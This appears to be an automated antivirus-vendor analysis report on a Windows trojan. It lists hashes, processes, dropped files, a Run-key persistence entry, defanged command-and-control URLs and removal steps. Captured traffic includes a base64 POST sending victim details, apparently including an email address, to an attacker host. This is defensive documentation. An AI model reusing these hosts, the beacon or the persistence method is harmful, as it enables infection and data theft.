Trojan.Win32.Scar.jbjc (Kaspersky), Gen:Variant.Kazy.604861 (B) (Emsisoft), Gen:Variant.Kazy.604861 (AdAware)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 000a8fff3dc7e5ee339acd7651e61389
SHA1: 8ea3631a532f4a2f8175e4604790d5b2cc4bf20f
SHA256: fd34939bdd9cf5ea9a89ae28668b13da840154eb427cff950a0ffa5f063ac55c
SSDeep: 6144:X1p9JPd0OmBRGezfbsNCuqkBPZxo4Wx2Pqe:H9JP d6ezfbsNCTihxzWpe
Size: 272384 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-04-29 21:56:08
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:344
qfjlkyhjspng.exe:4348
ewrrwkxzfemuscomjih.exe:2564
edxqdqrjinn.exe:3580
edxqdqrjinn.exe:5332
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
ShimCacheMutex
File activity
The process %original file name%.exe:344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)
The process qfjlkyhjspng.exe:4348 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
The process edxqdqrjinn.exe:3580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
C:\hgsywldzj\qnglq0unrq (84 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (0 bytes)
The process edxqdqrjinn.exe:5332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
The Trojan deletes the following file(s):
%WinDir%\hgsywldzj\icmjbyxsy1 (0 bytes)
Registry activity
The process %original file name%.exe:344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 33 C3 FC F0 18 9E 4B 26 B1 8D 41 D4 D2 26 8D"
The process ewrrwkxzfemuscomjih.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE A2 A6 D5 FE B6 E5 FA 9F F6 DB 69 C5 B8 34 1D"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe"
The process edxqdqrjinn.exe:3580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 15 81 A8 A9 CA 88 35 6F 21 06 0F A0 CF 22 08"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:344
qfjlkyhjspng.exe:4348
ewrrwkxzfemuscomjih.exe:2564
edxqdqrjinn.exe:3580
edxqdqrjinn.exe:5332
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\icmjbyxsy1 (12 bytes)
C:\hgsywldzj\ewrrwkxzfemuscomjih.exe (272 bytes)
C:\hgsywldzj\edxqdqrjinn.exe (1425 bytes)
C:\hgsywldzj\qfjlkyhjspng.exe (1425 bytes)
C:\hgsywldzj\qnglq0unrq (84 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Trap Credential Filtering KtmRm" = "C:\hgsywldzj\edxqdqrjinn.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 197786 | 198144 | 4.59472 | d3db33cbe1e67b5fc50d77d3ab9d3dd0 |
.rdata | 204800 | 51540 | 51712 | 4.29268 | e689de08fdfceeb94d7941142e8ddfbc |
.data | 258048 | 18780 | 7168 | 2.96275 | b56ddf3be60a92d054c9f7de7e054bb4 |
.reloc | 278528 | 14112 | 14336 | 4.68663 | b05f0be3485a2f936c5109f90eeec610 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://machineanimal.net/index.php | 72.52.4.91 |
hxxp://machineproblem.net/index.php | 184.168.221.34 |
hxxp://figureproblem.net/index.php | 98.139.135.198 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: machineproblem.net
HTTP/1.1 302 Found
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /index.php
POST /index.php HTTP/1.0
Accept: */*
Connection: close
Host: figureproblem.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
post=aG9jaHJlaW5qQGNpdGlmaW5hbmNpYWwuY29tCWhnc3l3bGR6agllZHhxZHFyamlubi5leGUJcWZqbGt5aGpzcG5nLmV4ZQlUcmFwIENyZWRlbnRpYWwgRmlsdGVyaW5nIEt0bVJtCVBhbmVsIFJlcG9ydHMgVGFibGV0IFRyYW5zYWN0aW9uCTAwNQ==
HTTP/1.0 200 OK
Date: Fri, 26 Jun 2015 15:08:45 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
<<< skipped >>>
GET /index.php HTTP/1.0
Accept: */*
Connection: close
Host: figureproblem.net
HTTP/1.0 200 OK
Date: Fri, 26 Jun 2015 15:08:44 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_344:
.text
`.rdata
@.data
.reloc
32.df
?w/
zumwoest dgcipdb eupeipzim zsfa bigufomjbi gfya ouu vdzufmce cboorovu ljcaaeuq umo gubolioq vexpitlhis mndecc oiievcec jdoq bfva bmvevtu rnfedaf grgine lnfophti slvocpvu celuli labmaolgne tichuhu acuzu jcnuszm wcej cxloa zau eodgniekb vtboufsy vwjifug uvidv jjdulp epagyo apbef dnbaps efnpep nbxofj dryuf hnluwleb nasrodj msgiiff uirafdisfe rld dzsoyosbui bnociotd jujaqiszlo faenc aozfji wbifebnnu efejsizsfi mnvaze abc sbcil hlel ymgouda hlsepe beye sb
*upjgaz hpcecvt pja dbsed ucrzescw oilnni gjbocb fibmeneny molc irhnuo gecom gxkinbce lfboofgg jtnoqqiyuf wxlammgax llamazady rlboaorgna zfuta cbsevnsowa unvsop bemtacm rrduep inwidef vas sdne bnpaepc pti ljgofaijco gnpuimc vridonvv sctaibgtip suqlirudpi dlsoq ssovafmpue ewmeau mojkixunli clzoifqne jvevetiz xrmamjj vadsupjlaa ooeljg oardkuf megfikjs pacvubre fbfofoys rgead egbful nmtampv gtbalpiso zvgifgdoea iuwjnarjbi gjago gtbujwfe palb pjn sljanao odsmawrkem frvad gjpilnk fuoj eevaj jnvozffoi imipg gsrio bfdunuver eemmsa modsoclcu mgdatfyiei ssgeplvi mpwi dzazuna epfleybru nsd juwhoyajou llzaf nhlaocfgo ammbemlg egl
uabod dzra epogei gnlo fngus ocs kbkucklog rzvohlli agxvomcfik osjz lcdode hnba xcz eqfsojuie zlpejdn fvsisortul teu wgleb llfigbtuel gfexezf aalicfii dsavulrqa rdna bbu xfitic cgjit ttahecibe jxqil mgjesrda xda asjionolr oyowlu ogpz bel jgjopspiu gbwinr ffg bllincdugi kzxe aklmelzoci ffhulzixob oofipga pszug rcr pojfuhmm agx fvc lntug srgaovlgec yvtukjjae ofd ucpeabe lhsi lrye bujponxqe hevulew cpdel zhdunmcuup upb iazdmahtul ukscukg rtcuzp byju lbgaad igglu sohdo aisjme relleigw fobpa pliciengl lmgebof eedencelo moxvivjj mddag aekoy uec faef sqzelwdu dasiyodi mimo oodeaib jmjudd znhuaa ifjw npeaoboc hpr utu rjtan qrkastm nfjifm accbutrzo
B%Q@e.Uv
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
GDI32.dll
GetKeyboardType
USER32.dll
GetCPInfo
GetProcessHeap
PeekNamedPipe
KERNEL32.dll
zcÃ
%Documents and Settings%\%current user%
C:\hgsywldzj\
c:\%original file name%.exe
0